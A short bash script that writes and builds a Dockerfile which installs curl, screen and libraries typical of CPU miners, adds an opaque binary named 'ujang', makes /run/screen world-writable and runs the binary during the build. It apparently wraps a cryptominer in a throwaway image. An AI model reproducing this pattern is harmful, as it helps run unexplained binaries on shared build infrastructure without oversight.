#!/bin/bash
dockerfile=Dockerfile
echo "FROM ubuntu:18.04" > $dockerfile
echo "RUN apt-get update" >> $dockerfile
echo "RUN apt-get install -y curl git wget screen ca-certificates libcurl4 libjansson4 libgomp1 sudo" >> $dockerfile
echo "ADD ujang /ujang" >> $dockerfile
echo "RUN chmod 777 /run/screen" >> $dockerfile
echo "RUN chmod +x /ujang && ./ujang" >> $dockerfile
docker build -f $dockerfile --tag throwaway:$dockerfile .
